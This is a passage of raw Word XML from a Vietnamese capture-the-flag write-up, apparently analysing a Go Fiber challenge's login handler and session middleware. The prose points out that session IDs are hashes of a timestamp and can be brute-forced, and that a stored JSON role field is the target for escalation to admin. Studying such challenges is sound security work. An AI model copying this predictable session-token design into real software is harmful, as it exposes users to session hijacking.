          <w:p w14:paraId="51E2BD5D" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0287898E" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24B4CE3A" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47583F0B" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F776DC7" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43BB2A88" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E5B88EE" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A11763" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770AED6E" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79438533" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E59F9A1" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CCA51F4" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B6EDE3" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CD0D4AF" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="227C38C2" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="129A35A2" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41084272" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E9EAE6" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:lastRenderedPageBreak/>
              <w:t>func LoginHandler(c *fiber.Ctx) error {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE57171" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>var credentials Credentials</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193DC782" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> err := c.BodyParser(&amp;credentials); err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721B7654" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> utils.ErrorResponse(c, err.Error(), http.StatusBadRequest)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="229765E2" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="252C6233" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="32C002DD" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t>sessionID := fmt.Sprintf(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>%x</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t>, sha256.Sum256([]byte(strconv.FormatInt(time.Now().Unix(), 10))))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B3AA4F1" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="63D65E0E" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>err := PrepareSession(sessionID, credentials.Username)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31E33B3E" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="75649289" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E5689E2" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> utils.ErrorResponse(c, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Error wrong!"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t>, http.StatusInternalServerError)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48F45D2C" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A7320E" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="66383174" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>user, err := loginUser(credentials.Username, credentials.Password)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14CE1E56" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="426E91FF" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> utils.ErrorResponse(c, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Invalid username or Password"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t>, http.StatusBadRequest)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E3CBCA" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C0DCA4B" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="081664C9" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>sessId := CreateSession(sessionID, user)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E2515B6" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="4FBEC4C7" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>cookie := fiber.Cookie{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648FE214" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t xml:space="preserve">Name:    </w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"session"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE106A8" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>Value:   sessId,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C962BB" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>Expires: time.Now().Add(3600 * time.Hour),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DDD519C" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E90B7EC" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="60ECA1F0" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>c.Cookie(&amp;cookie)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710D5FC8" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="29207591" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>usernameCookie := fiber.Cookie{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D4B0388" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t xml:space="preserve">Name:    </w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"username"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D359AA" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>Value:   credentials.Username,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44239FC1" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>Expires: time.Now().Add(3600 * time.Hour),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B49684" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BFF12E8" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="238516AA" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
              <w:t>c.Cookie(&amp;usernameCookie)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43C33D11" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC"/>
          <w:p w14:paraId="340A8FB1" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> c.Redirect(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/user/upload"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A910CC">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14373CF7" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05A7926B" w14:textId="1387B24C" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="00C56BD8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Trước tiên, chúng ta có thể thấy logic tạo ra </w:t>
      </w:r>
      <w:r w:rsidR="00C56BD8" w:rsidRPr="007710FD">
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00C56BD8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>này có vấn đề; nó hoàn toàn dựa trên dấu thời gian, vốn có khả năng bị tấn công bằng phương pháp brute-force. Tất nhiên, điều này đòi hỏi người dùng có quyền quản trị viên phải đăng nhập và biết tên người dùng để khai thác. Trong thử thách này, không nên có bất kỳ người dùng nào khác đăng nhập bằng quyền quản trị viên, vì vậy hiện tại không thể khai thác được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A8D2A4" w14:textId="15792765" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="00C56BD8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Hàm PrepareSession</w:t>
      </w:r>
      <w:r w:rsidR="00422A6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>khá thú vị; nó chỉ thực hiện một chức năng: sử dụng tên người dùng làm khóa và ghi phiên được tạo làm giá trị vào Redis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA580CB" w14:textId="65034C7C" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="00C56BD8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>CreateSession</w:t>
      </w:r>
      <w:r w:rsidR="00422A6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>lưu phiên đã tạo dưới dạng tệp có định dạng /tmp/sessions/{username}. Định dạng tệp phiên là JSON, nhằm mục đích thay đổi vai trò của người dùng hiện tại thành quản trị viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4AD3D3" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{"username":"test","id":1,"role":"user"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD0498" w14:textId="16BCD34F" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>Cuối cùng, có một hàm trung gian SessionMiddleware</w:t>
      </w:r>
      <w:r w:rsidR="00422A6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>được gọi trước khi truy cập bất kỳ /userđường dẫn nào:</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F778B" w:rsidRPr="002F778B" w14:paraId="0D9A2143" w14:textId="77777777" w:rsidTr="003D6F23">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BF785AE" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="002F778B">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D03DE6" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CE38AA7" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="204B0A4D" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D6F972" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="472C8393" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C06D4E" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E2E0714" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66D25784" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E744735" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DDC9771" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52AAA610" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B18FBF" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E48DB7" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="681DA515" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5452FD5B" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ECE6706" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:t>func SessionMiddleware(c *fiber.Ctx) error {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F53184A" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
              <w:t>sessionID := c.Cookies(</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"session"</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D790D2" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
              <w:t>username := c.Cookies(</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"username"</w:t>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55DB9C22" w14:textId="77777777" w:rsidR="002F778B" w:rsidRPr="002F778B" w:rsidRDefault="002F778B" w:rsidP="002F778B">
            <w:r w:rsidRPr="002F778B">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F778B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
